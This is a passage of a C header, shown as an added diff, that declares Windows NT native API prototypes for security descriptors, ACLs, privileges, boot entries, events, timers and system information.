); + +NTSTATUS +NTAPI +RtlDeleteAce( + PACL Acl, + ULONG AceIndex + ); + +NTSTATUS +NTAPI +RtlGetAce( + PACL Acl, + ULONG AceIndex, + PVOID *Ace + ); + +NTSTATUS +NTAPI +RtlSetOwnerSecurityDescriptor( + IN OUT PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID Owner, + IN OPTIONAL BOOLEAN OwnerDefaulted + ); + +NTSTATUS +NTAPI +RtlGetOwnerSecurityDescriptor( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + OUT PSID *Owner, + OUT PBOOLEAN OwnerDefaulted + ); + +NTSTATUS +NTAPI +RtlAddAccessAllowedAce( + PACL Acl, + ULONG AceRevision, + ACCESS_MASK AccessMask, + PSID Sid + ); + +NTSTATUS +NTAPI +RtlAddAccessAllowedAceEx( + PACL Acl, + ULONG AceRevision, + ULONG AceFlags, + ACCESS_MASK AccessMask, + PSID Sid + ); + +NTSTATUS +NTAPI +RtlAddAccessDeniedAce( + PACL Acl, + ULONG AceRevision, + ACCESS_MASK AccessMask, + PSID Sid + ); + +NTSTATUS +NTAPI +RtlAddAccessDeniedAceEx( + PACL Acl, + ULONG AceRevision, + ULONG AceFlags, + ACCESS_MASK AccessMask, + PSID Sid + ); + +NTSTATUS +NTAPI +RtlAddAuditAccessAce( + PACL Acl, + ULONG AceRevision, + ACCESS_MASK AccessMask, + PSID Sid, + BOOLEAN AuditSuccess, + BOOLEAN AuditFailure + ); + +NTSTATUS +NTAPI +RtlAddAuditAccessAceEx( + PACL Acl, + ULONG AceRevision, + ULONG AceFlags, + ACCESS_MASK AccessMask, + PSID Sid, + BOOLEAN AuditSuccess, + BOOLEAN AuditFailure + ); + +NTSTATUS +NTAPI +RtlAddAccessAllowedObjectAce( + IN OUT PACL Acl, + IN ULONG AceRevision, + IN ULONG AceFlags, + IN ACCESS_MASK AccessMask, + IN GUID *ObjectTypeGuid OPTIONAL, + IN GUID *InheritedObjectTypeGuid OPTIONAL, + IN PSID Sid + ); + +NTSTATUS +NTAPI +RtlAddAccessDeniedObjectAce( + IN OUT PACL Acl, + IN ULONG AceRevision, + IN ULONG AceFlags, + IN ACCESS_MASK AccessMask, + IN GUID *ObjectTypeGuid OPTIONAL, + IN GUID *InheritedObjectTypeGuid OPTIONAL, + IN PSID Sid + ); + +NTSTATUS +NTAPI +RtlAddAuditAccessObjectAce( + IN OUT PACL Acl, + IN ULONG AceRevision, + IN ULONG AceFlags, + IN ACCESS_MASK AccessMask, + IN GUID *ObjectTypeGuid OPTIONAL, + IN GUID *InheritedObjectTypeGuid OPTIONAL, + IN PSID Sid, + BOOLEAN AuditSuccess, + BOOLEAN AuditFailure + ); + +BOOLEAN +NTAPI +RtlFirstFreeAce( + PACL Acl, + PVOID *FirstFree + ); + +NTSTATUS +NTAPI +RtlAddCompoundAce( + IN PACL Acl, + IN ULONG AceRevision, + IN UCHAR AceType, + IN ACCESS_MASK AccessMask, + IN PSID ServerSid, + IN PSID ClientSid + ); + +NTSTATUS +NTAPI +RtlCreateSecurityDescriptor( + PSECURITY_DESCRIPTOR SecurityDescriptor, + ULONG Revision + ); + +NTSTATUS +NTAPI +RtlCreateSecurityDescriptorRelative( + PISECURITY_DESCRIPTOR_RELATIVE SecurityDescriptor, + ULONG Revision + ); + +BOOLEAN +NTAPI +RtlValidSecurityDescriptor( + PSECURITY_DESCRIPTOR SecurityDescriptor + ); + +ULONG +NTAPI +RtlLengthSecurityDescriptor( + PSECURITY_DESCRIPTOR SecurityDescriptor + ); + +BOOLEAN +NTAPI +RtlValidRelativeSecurityDescriptor( + IN PSECURITY_DESCRIPTOR SecurityDescriptorInput, + IN ULONG SecurityDescriptorLength, + IN SECURITY_INFORMATION RequiredInformation + ); + +NTSTATUS +NTAPI +RtlGetControlSecurityDescriptor ( + PSECURITY_DESCRIPTOR SecurityDescriptor, + PSECURITY_DESCRIPTOR_CONTROL Control, + PULONG Revision + ); + +NTSTATUS +NTAPI +RtlSetControlSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR pSecurityDescriptor, + IN SECURITY_DESCRIPTOR_CONTROL ControlBitsOfInterest, + IN SECURITY_DESCRIPTOR_CONTROL ControlBitsToSet + ); + +NTSTATUS +NTAPI +RtlSetAttributesSecurityDescriptor( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN SECURITY_DESCRIPTOR_CONTROL Control, + IN OUT PULONG Revision + ); + +NTSTATUS +NTAPI +RtlSetDaclSecurityDescriptor ( + PSECURITY_DESCRIPTOR SecurityDescriptor, + BOOLEAN DaclPresent, + PACL Dacl, + BOOLEAN DaclDefaulted + ); + +NTSTATUS +NTAPI +RtlGetDaclSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + OUT PBOOLEAN DaclPresent, + OUT PACL *Dacl, + OUT PBOOLEAN DaclDefaulted + ); + +BOOLEAN +NTAPI +RtlGetSecurityDescriptorRMControl( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + OUT PUCHAR RMControl + ); + +VOID +NTAPI +RtlSetSecurityDescriptorRMControl( + IN OUT PSECURITY_DESCRIPTOR SecurityDescriptor, + IN PUCHAR RMControl OPTIONAL + ); + +NTSTATUS +NTAPI +RtlSetSaclSecurityDescriptor ( + PSECURITY_DESCRIPTOR SecurityDescriptor, + BOOLEAN SaclPresent, + PACL Sacl, + BOOLEAN SaclDefaulted + ); + +NTSTATUS +NTAPI +RtlGetSaclSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + OUT PBOOLEAN SaclPresent, + OUT PACL *Sacl, + OUT PBOOLEAN SaclDefaulted + ); + +NTSTATUS +NTAPI +RtlSetGroupSecurityDescriptor ( + IN OUT PSECURITY_DESCRIPTOR SecurityDescriptor, + IN PSID Group OPTIONAL, + IN BOOLEAN GroupDefaulted OPTIONAL + ); + +NTSTATUS +NTAPI +RtlGetGroupSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + OUT PSID *Group, + OUT PBOOLEAN GroupDefaulted + ); + +NTSTATUS +NTAPI +RtlMakeSelfRelativeSD ( + IN PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor, + OUT PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor, + IN OUT PULONG BufferLength + ); + +NTSTATUS +NTAPI +RtlAbsoluteToSelfRelativeSD ( + IN PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor, + OUT PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor, + IN OUT PULONG BufferLength + ); + +NTSTATUS +NTAPI +RtlSelfRelativeToAbsoluteSD ( + IN PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor, + OUT OPTIONAL PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor, + IN OUT PULONG AbsoluteSecurityDescriptorSize, + OUT OPTIONAL PACL Dacl, + IN OUT PULONG DaclSize, + OUT OPTIONAL PACL Sacl, + IN OUT PULONG SaclSize, + OUT OPTIONAL PSID Owner, + IN OUT PULONG OwnerSize, + OUT OPTIONAL PSID PrimaryGroup, + IN OUT PULONG PrimaryGroupSize + ); + +NTSTATUS +NTAPI +RtlSelfRelativeToAbsoluteSD2 ( + IN OUT PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor, + IN OUT PULONG pBufferSize + ); + +NTSTATUS +NTAPI +RtlNewSecurityGrantedAccess ( + ACCESS_MASK DesiredAccess, + PPRIVILEGE_SET Privileges, + PULONG Length, + HANDLE Token, + PGENERIC_MAPPING GenericMapping, + PACCESS_MASK RemainingDesiredAccess + ); + +NTSTATUS +NTAPI +RtlMapSecurityErrorToNtStatus ( + SECURITY_STATUS Error + ); + +NTSTATUS +NTAPI +RtlImpersonateSelf ( + IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel + ); + +NTSTATUS +NTAPI +RtlAdjustPrivilege ( + ULONG Privilege, + BOOLEAN Enable, + BOOLEAN Client, + PBOOLEAN WasEnabled + ); + +NTSTATUS +NTAPI +RtlAcquirePrivilege ( + PULONG Privilege, + ULONG NumPriv, + ULONG Flags, + PVOID *ReturnedState + ); + +VOID +NTAPI +RtlReleasePrivilege ( + PVOID StatePointer + ); + +VOID +NTAPI +RtlRunEncodeUnicodeString( + PUCHAR Seed OPTIONAL, + PUNICODE_STRING String + ); + +VOID +NTAPI +RtlRunDecodeUnicodeString( + UCHAR Seed, + PUNICODE_STRING String + ); + +VOID +NTAPI +RtlEraseUnicodeString( + PUNICODE_STRING String + ); + +NTSTATUS +NTAPI +RtlFindMessage( + PVOID DllHandle, + ULONG MessageTableId, + ULONG MessageLanguageId, + ULONG MessageId, + PMESSAGE_RESOURCE_ENTRY *MessageEntry + ); + +NTSTATUS +NTAPI +RtlFormatMessage( + IN PWSTR MessageFormat, + IN ULONG MaximumWidth, + IN BOOLEAN IgnoreInserts, + IN BOOLEAN ArgumentsAreAnsi, + IN BOOLEAN ArgumentsAreAnArray, + IN va_list *Arguments, + OUT PWSTR Buffer, + IN ULONG Length, + OUT OPTIONAL PULONG ReturnLength + ); + +NTSTATUS +NTAPI +RtlFormatMessageEx( + IN PWSTR MessageFormat, + IN ULONG MaximumWidth, + IN BOOLEAN IgnoreInserts, + IN BOOLEAN ArgumentsAreAnsi, + IN BOOLEAN ArgumentsAreAnArray, + IN va_list *Arguments, + OUT PWSTR Buffer, + IN ULONG Length, + OUT OPTIONAL PULONG ReturnLength, + OUT OPTIONAL PPARSE_MESSAGE_CONTEXT ParseContext + ); + +NTSTATUS +NTAPI +RtlInitializeRXact( + IN HANDLE RootRegistryKey, + IN BOOLEAN CommitIfNecessary, + OUT PRTL_RXACT_CONTEXT *RXactContext + ); + +NTSTATUS +NTAPI +RtlStartRXact( + IN PRTL_RXACT_CONTEXT RXactContext + ); + +NTSTATUS +NTAPI +RtlAbortRXact( + IN PRTL_RXACT_CONTEXT RXactContext + ); + +NTSTATUS +NTAPI +RtlAddAttributeActionToRXact( + IN PRTL_RXACT_CONTEXT RXactContext, + IN RTL_RXACT_OPERATION Operation, + IN PUNICODE_STRING SubKeyName, + IN HANDLE KeyHandle, + IN PUNICODE_STRING AttributeName, + IN ULONG NewValueType, + IN PVOID NewValue, + IN ULONG NewValueLength + ); + +NTSTATUS +NTAPI +RtlAddActionToRXact( + IN PRTL_RXACT_CONTEXT RXactContext, + IN RTL_RXACT_OPERATION Operation, + IN PUNICODE_STRING SubKeyName, + IN ULONG NewKeyValueType, + IN PVOID NewKeyValue OPTIONAL, + IN ULONG NewKeyValueLength + ); + +NTSTATUS +NTAPI +RtlApplyRXact( + IN PRTL_RXACT_CONTEXT RXactContext + ); + +NTSTATUS +NTAPI +RtlApplyRXactNoFlush( + IN PRTL_RXACT_CONTEXT RXactContext + ); + +ULONG +NTAPI +RtlNtStatusToDosError ( + NTSTATUS Status + ); + +ULONG +NTAPI +RtlNtStatusToDosErrorNoTeb ( + NTSTATUS Status + ); + +PPEB +RtlGetCurrentPeb ( + VOID + ); + +NTSTATUS +NTAPI +RtlCustomCPToUnicodeN( + IN PCPTABLEINFO CustomCP, + OUT PWCH UnicodeString, + IN ULONG MaxBytesInUnicodeString, + OUT OPTIONAL PULONG BytesInUnicodeString, + IN PCH CustomCPString, + IN ULONG BytesInCustomCPString + ); + +NTSTATUS +NTAPI +RtlUnicodeToCustomCPN( + IN PCPTABLEINFO CustomCP, + OUT PCH CustomCPString, + IN ULONG MaxBytesInCustomCPString, + OUT OPTIONAL PULONG BytesInCustomCPString, + IN PWCH UnicodeString, + IN ULONG BytesInUnicodeString + ); + +NTSTATUS +NTAPI +RtlUpcaseUnicodeToCustomCPN( + IN PCPTABLEINFO CustomCP, + OUT PCH CustomCPString, + IN ULONG MaxBytesInCustomCPString, + OUT OPTIONAL PULONG BytesInCustomCPString, + IN PWCH UnicodeString, + IN ULONG BytesInUnicodeString + ); + +VOID +NTAPI +RtlInitCodePageTable( + IN PUSHORT TableBase, + OUT PCPTABLEINFO CodePageTable + ); + +VOID +NTAPI +RtlInitNlsTables( + IN PUSHORT AnsiNlsBase, + IN PUSHORT OemNlsBase, + IN PUSHORT LanguageNlsBase, + OUT PNLSTABLEINFO TableInfo + ); + +VOID +NTAPI +RtlResetRtlTranslations( + PNLSTABLEINFO TableInfo + ); + +VOID +NTAPI +RtlGetDefaultCodePage( + OUT PUSHORT AnsiCodePage, + OUT PUSHORT OemCodePage + ); + +VOID +NTAPI +RtlInitializeRangeList( + IN OUT PRTL_RANGE_LIST RangeList + ); + +VOID +NTAPI +RtlFreeRangeList( + IN PRTL_RANGE_LIST RangeList + ); + +NTSTATUS +NTAPI +RtlCopyRangeList( + OUT PRTL_RANGE_LIST CopyRangeList, + IN PRTL_RANGE_LIST RangeList + ); + +NTSTATUS +NTAPI +RtlAddRange( + IN OUT PRTL_RANGE_LIST RangeList, + IN ULONGLONG Start, + IN ULONGLONG End, + IN UCHAR Attributes, + IN ULONG Flags, + IN PVOID UserData, OPTIONAL + IN PVOID Owner OPTIONAL + ); + +NTSTATUS +NTAPI +RtlDeleteRange( + IN OUT PRTL_RANGE_LIST RangeList, + IN ULONGLONG Start, + IN ULONGLONG End, + IN PVOID Owner + ); + +NTSTATUS +NTAPI +RtlDeleteOwnersRanges( + IN OUT PRTL_RANGE_LIST RangeList, + IN PVOID Owner + ); + +NTSTATUS +NTAPI +RtlFindRange( + IN PRTL_RANGE_LIST RangeList, + IN ULONGLONG Minimum, + IN ULONGLONG Maximum, + IN ULONG Length, + IN ULONG Alignment, + IN ULONG Flags, + IN UCHAR AttributeAvailableMask, + IN PVOID Context OPTIONAL, + IN PRTL_CONFLICT_RANGE_CALLBACK Callback OPTIONAL, + OUT PULONGLONG Start + ); + +NTSTATUS +NTAPI +RtlIsRangeAvailable( + IN PRTL_RANGE_LIST RangeList, + IN ULONGLONG Start, + IN ULONGLONG End, + IN ULONG Flags, + IN UCHAR AttributeAvailableMask, + IN PVOID Context OPTIONAL, + IN PRTL_CONFLICT_RANGE_CALLBACK Callback OPTIONAL, + OUT PBOOLEAN Available + ); + +NTSTATUS +NTAPI +RtlGetFirstRange( + IN PRTL_RANGE_LIST RangeList, + OUT PRTL_RANGE_LIST_ITERATOR Iterator, + OUT PRTL_RANGE *Range + ); + +NTSTATUS +NTAPI +RtlGetLastRange( + IN PRTL_RANGE_LIST RangeList, + OUT PRTL_RANGE_LIST_ITERATOR Iterator, + OUT PRTL_RANGE *Range + ); + +NTSTATUS +NTAPI +RtlGetNextRange( + IN OUT PRTL_RANGE_LIST_ITERATOR Iterator, + OUT PRTL_RANGE *Range, + IN BOOLEAN MoveForwards + ); + +NTSTATUS +NTAPI +RtlMergeRangeLists( + OUT PRTL_RANGE_LIST MergedRangeList, + IN PRTL_RANGE_LIST RangeList1, + IN PRTL_RANGE_LIST RangeList2, + IN ULONG Flags + ); + +NTSTATUS +NTAPI +RtlInvertRangeList( + OUT PRTL_RANGE_LIST InvertedRangeList, + IN PRTL_RANGE_LIST RangeList + ); + +NTSTATUS +NTAPI +RtlVolumeDeviceToDosName( + IN PVOID VolumeDeviceObject, + OUT PUNICODE_STRING DosName + ); + +NTSTATUS +NTAPI +RtlCreateSystemVolumeInformationFolder( + IN PUNICODE_STRING VolumeRootPath + ); + +#if defined(_WINNT_) && (_MSC_VER < 1300) +typedef POSVERSIONINFOW PRTL_OSVERSIONINFOW; +typedef POSVERSIONINFOEXW PRTL_OSVERSIONINFOEXW; + +typedef LONG (NTAPI *PVECTORED_EXCEPTION_HANDLER)( struct _EXCEPTION_POINTERS *ExceptionInfo ); +typedef VOID (NTAPI * APC_CALLBACK_FUNCTION) (DWORD , PVOID, PVOID); + +typedef const GUID *LPCGUID; + +#endif + +NTSTATUS +RtlGetVersion( + OUT PRTL_OSVERSIONINFOW lpVersionInformation + ); + +NTSTATUS +RtlVerifyVersionInfo( + IN PRTL_OSVERSIONINFOEXW VersionInfo, + IN ULONG TypeMask, + IN ULONGLONG ConditionMask + ); + +BOOLEAN +RtlFlushSecureMemoryCache( + PVOID lpAddr, + SIZE_T size + ); + +LONG +NTAPI +RtlGetLastWin32Error( + VOID + ); + +VOID +NTAPI +RtlSetLastWin32ErrorAndNtStatusFromNtStatus( + NTSTATUS Status + ); + +VOID +NTAPI +RtlSetLastWin32Error( + LONG Win32Error + ); + +VOID +NTAPI +RtlRestoreLastWin32Error( + LONG Win32Error + ); + +NTSTATUS +NTAPI +RtlGetSetBootStatusData( + IN HANDLE Handle, + IN BOOLEAN Get, + IN RTL_BSD_ITEM_TYPE DataItem, + IN PVOID DataBuffer, + IN ULONG DataBufferLength, + OUT PULONG ByteRead OPTIONAL + ); + +NTSTATUS +NTAPI +RtlLockBootStatusData( + OUT PHANDLE BootStatusDataHandle + ); + +VOID +NTAPI +RtlUnlockBootStatusData( + IN HANDLE BootStatusDataHandle + ); + +NTSTATUS +NTAPI +RtlCreateBootStatusDataFile( + VOID + ); + +// + +// +// begin_ntapi +NTSTATUS +NTAPI +NtDelayExecution( + IN BOOLEAN Alertable, + IN PLARGE_INTEGER DelayInterval + ); + + +NTSTATUS +NTAPI +NtQuerySystemEnvironmentValue ( + IN PUNICODE_STRING VariableName, + OUT PWSTR VariableValue, + IN USHORT ValueLength, + OUT OPTIONAL PUSHORT ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetSystemEnvironmentValue ( + IN PUNICODE_STRING VariableName, + IN PUNICODE_STRING VariableValue + ); + + +NTSTATUS +NTAPI +NtQuerySystemEnvironmentValueEx ( + IN PUNICODE_STRING VariableName, + IN LPGUID VendorGuid, + OUT OPTIONAL PVOID Value, + IN OUT PULONG ValueLength, + OUT OPTIONAL PULONG Attributes + ); + + +NTSTATUS +NTAPI +NtSetSystemEnvironmentValueEx ( + IN PUNICODE_STRING VariableName, + IN LPGUID VendorGuid, + IN OPTIONAL PVOID Value, + IN ULONG ValueLength, + IN ULONG Attributes + ); + + +NTSTATUS +NTAPI +NtEnumerateSystemEnvironmentValuesEx ( + IN ULONG InformationClass, + OUT PVOID Buffer, + IN OUT PULONG BufferLength + ); + + +NTSTATUS +NTAPI +NtAddBootEntry ( + IN PBOOT_ENTRY BootEntry, + OUT OPTIONAL PULONG Id + ); + + +NTSTATUS +NTAPI +NtDeleteBootEntry ( + IN ULONG Id + ); + + +NTSTATUS +NTAPI +NtModifyBootEntry ( + IN PBOOT_ENTRY BootEntry + ); + + +NTSTATUS +NTAPI +NtEnumerateBootEntries ( + OUT OPTIONAL PVOID Buffer, + IN OUT PULONG BufferLength + ); + + +NTSTATUS +NTAPI +NtQueryBootEntryOrder ( + OUT OPTIONAL PULONG Ids, + IN OUT PULONG Count + ); + + +NTSTATUS +NTAPI +NtSetBootEntryOrder ( + IN PULONG Ids, + IN ULONG Count + ); + + +NTSTATUS +NTAPI +NtQueryBootOptions ( + OUT OPTIONAL PBOOT_OPTIONS BootOptions, + IN OUT PULONG BootOptionsLength + ); + + +NTSTATUS +NTAPI +NtSetBootOptions ( + IN PBOOT_OPTIONS BootOptions, + IN ULONG FieldsToChange + ); + + +NTSTATUS +NTAPI +NtTranslateFilePath ( + IN PFILE_PATH InputFilePath, + IN ULONG OutputType, + OUT OPTIONAL PFILE_PATH OutputFilePath, + IN OUT OPTIONAL PULONG OutputFilePathLength + ); + + +NTSTATUS +NTAPI +NtAddDriverEntry ( + IN PEFI_DRIVER_ENTRY DriverEntry, + OUT OPTIONAL PULONG Id + ); + + +NTSTATUS +NTAPI +NtDeleteDriverEntry ( + IN ULONG Id + ); + + +NTSTATUS +NTAPI +NtModifyDriverEntry ( + IN PEFI_DRIVER_ENTRY DriverEntry + ); + + +NTSTATUS +NTAPI +NtEnumerateDriverEntries ( + OUT PVOID Buffer, + IN OUT PULONG BufferLength + ); + + +NTSTATUS +NTAPI +NtQueryDriverEntryOrder ( + OUT PULONG Ids, + IN OUT PULONG Count + ); + + +NTSTATUS +NTAPI +NtSetDriverEntryOrder ( + IN PULONG Ids, + IN ULONG Count + ); + + +NTSTATUS +NTAPI +NtClearEvent ( + IN HANDLE EventHandle + ); + + +NTSTATUS +NTAPI +NtCreateEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN EVENT_TYPE EventType, + IN BOOLEAN InitialState + ); + + +NTSTATUS +NTAPI +NtOpenEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtPulseEvent ( + IN HANDLE EventHandle, + OUT OPTIONAL PLONG PreviousState + ); + + +NTSTATUS +NTAPI +NtQueryEvent ( + IN HANDLE EventHandle, + IN EVENT_INFORMATION_CLASS EventInformationClass, + OUT PVOID EventInformation, + IN ULONG EventInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtResetEvent ( + IN HANDLE EventHandle, + OUT OPTIONAL PLONG PreviousState + ); + + +NTSTATUS +NTAPI +NtSetEvent ( + IN HANDLE EventHandle, + OUT OPTIONAL PLONG PreviousState + ); + + +NTSTATUS +NTAPI +NtSetEventBoostPriority ( + IN HANDLE EventHandle + ); + + +NTSTATUS +NTAPI +NtCreateEventPair ( + OUT PHANDLE EventPairHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtOpenEventPair ( + OUT PHANDLE EventPairHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtWaitLowEventPair ( + IN HANDLE EventPairHandle + ); + + +NTSTATUS +NTAPI +NtWaitHighEventPair ( + IN HANDLE EventPairHandle + ); + + +NTSTATUS +NTAPI +NtSetLowWaitHighEventPair ( + IN HANDLE EventPairHandle + ); + + +NTSTATUS +NTAPI +NtSetHighWaitLowEventPair ( + IN HANDLE EventPairHandle + ); + + +NTSTATUS +NTAPI +NtSetLowEventPair ( + IN HANDLE EventPairHandle + ); + + +NTSTATUS +NTAPI +NtSetHighEventPair ( + IN HANDLE EventPairHandle + ); + + +NTSTATUS +NTAPI +NtCreateMutant ( + OUT PHANDLE MutantHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN BOOLEAN InitialOwner + ); + + +NTSTATUS +NTAPI +NtOpenMutant ( + OUT PHANDLE MutantHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtQueryMutant ( + IN HANDLE MutantHandle, + IN MUTANT_INFORMATION_CLASS MutantInformationClass, + OUT PVOID MutantInformation, + IN ULONG MutantInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtReleaseMutant ( + IN HANDLE MutantHandle, + OUT OPTIONAL PLONG PreviousCount + ); + + +NTSTATUS +NTAPI +NtCreateSemaphore ( + OUT PHANDLE SemaphoreHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN LONG InitialCount, + IN LONG MaximumCount + ); + + +NTSTATUS +NTAPI +NtOpenSemaphore( + OUT PHANDLE SemaphoreHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtQuerySemaphore ( + IN HANDLE SemaphoreHandle, + IN SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass, + OUT PVOID SemaphoreInformation, + IN ULONG SemaphoreInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtReleaseSemaphore( + IN HANDLE SemaphoreHandle, + IN LONG ReleaseCount, + OUT OPTIONAL PLONG PreviousCount + ); + + +NTSTATUS +NTAPI +NtCreateTimer ( + OUT PHANDLE TimerHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN TIMER_TYPE TimerType + ); + + +NTSTATUS +NTAPI +NtOpenTimer ( + OUT PHANDLE TimerHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtCancelTimer ( + IN HANDLE TimerHandle, + OUT OPTIONAL PBOOLEAN CurrentState + ); + + +NTSTATUS +NTAPI +NtQueryTimer ( + IN HANDLE TimerHandle, + IN TIMER_INFORMATION_CLASS TimerInformationClass, + OUT PVOID TimerInformation, + IN ULONG TimerInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetTimer ( + IN HANDLE TimerHandle, + IN PLARGE_INTEGER DueTime, + IN OPTIONAL PTIMER_APC_ROUTINE TimerApcRoutine, + IN OPTIONAL PVOID TimerContext, + IN BOOLEAN ResumeTimer, + IN OPTIONAL LONG Period, + OUT OPTIONAL PBOOLEAN PreviousState + ); + + +NTSTATUS +NTAPI +NtQuerySystemTime ( + OUT PLARGE_INTEGER SystemTime + ); + + +NTSTATUS +NTAPI +NtSetSystemTime ( + IN OPTIONAL PLARGE_INTEGER SystemTime, + OUT OPTIONAL PLARGE_INTEGER PreviousTime + ); + + +NTSTATUS +NTAPI +NtQueryTimerResolution ( + OUT PULONG MaximumTime, + OUT PULONG MinimumTime, + OUT PULONG CurrentTime + ); + + +NTSTATUS +NTAPI +NtSetTimerResolution ( + IN ULONG DesiredTime, + IN BOOLEAN SetResolution, + OUT PULONG ActualTime + ); + + +NTSTATUS +NTAPI +NtAllocateLocallyUniqueId ( + OUT PLUID Luid + ); + + +NTSTATUS +NTAPI +NtSetUuidSeed ( + IN PCHAR Seed + ); + + +NTSTATUS +NTAPI +NtAllocateUuids ( + OUT PULARGE_INTEGER Time, + OUT PULONG Range, + OUT PULONG Sequence, + OUT PCHAR Seed + ); + + +NTSTATUS +NTAPI +NtCreateProfile ( + OUT PHANDLE ProfileHandle, + IN HANDLE Process OPTIONAL, + IN PVOID ProfileBase, + IN SIZE_T ProfileSize, + IN ULONG BucketSize, + IN PULONG Buffer, + IN ULONG BufferSize, + IN KPROFILE_SOURCE ProfileSource, + IN KAFFINITY Affinity + ); + + +NTSTATUS +NTAPI +NtStartProfile ( + IN HANDLE ProfileHandle + ); + + +NTSTATUS +NTAPI +NtStopProfile ( + IN HANDLE ProfileHandle + ); + + +NTSTATUS +NTAPI +NtSetIntervalProfile ( + IN ULONG Interval, + IN KPROFILE_SOURCE Source + ); + + +NTSTATUS +NTAPI +NtQueryIntervalProfile ( + IN KPROFILE_SOURCE ProfileSource, + OUT PULONG Interval + ); + + +NTSTATUS +NTAPI +NtQueryPerformanceCounter ( + OUT PLARGE_INTEGER PerformanceCounter, + OUT OPTIONAL PLARGE_INTEGER PerformanceFrequency + ); + + +NTSTATUS +NTAPI +NtCreateKeyedEvent ( + OUT PHANDLE KeyedEventHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG Flags + ); + + +NTSTATUS +NTAPI +NtOpenKeyedEvent ( + OUT PHANDLE KeyedEventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtReleaseKeyedEvent ( + IN HANDLE KeyedEventHandle, + IN PVOID KeyValue, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtWaitForKeyedEvent ( + IN HANDLE KeyedEventHandle, + IN PVOID KeyValue, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtQuerySystemInformation ( + IN SYSTEM_INFORMATION_CLASS SystemInformationClass, + OUT OPTIONAL PVOID SystemInformation, + IN ULONG SystemInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetSystemInformation ( + IN SYSTEM_INFORMATION_CLASS SystemInformationClass, + IN OPTIONAL PVOID SystemInformation, + IN ULONG SystemInformationLength + ); + + +NTSTATUS +NTAPI +NtSystemDebugControl ( + IN SYSDBG_COMMAND Command, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtRaiseHardError ( + IN NTSTATUS ErrorStatus, + IN ULONG NumberOfParameters, + IN ULONG UnicodeStringParameterMask, + IN OPTIONAL PULONG_PTR Parameters, + IN ULONG ValidResponseOptions, + OUT PULONG Response + ); + + +NTSTATUS +NTAPI +NtQueryDefaultLocale ( + IN BOOLEAN UserProfile, + OUT PLCID DefaultLocaleId + ); + + +NTSTATUS +NTAPI +NtSetDefaultLocale ( + IN BOOLEAN UserProfile, + IN LCID DefaultLocaleId + ); + + +NTSTATUS +NTAPI +NtQueryInstallUILanguage ( + OUT LANGID *InstallUILanguageId + ); + + +NTSTATUS +NTAPI +NtQueryDefaultUILanguage ( + OUT LANGID *DefaultUILanguageId + ); + + +NTSTATUS +NTAPI +NtSetDefaultUILanguage ( + IN LANGID DefaultUILanguageId + ); + + +NTSTATUS +NTAPI +NtSetDefaultHardErrorPort( + IN HANDLE DefaultHardErrorPort + ); + + +NTSTATUS +NTAPI +NtShutdownSystem ( + IN SHUTDOWN_ACTION Action + ); + + +NTSTATUS +NTAPI +NtDisplayString ( + IN PUNICODE_STRING String + ); + + +NTSTATUS +NTAPI +NtAddAtom ( + IN OPTIONAL PWSTR 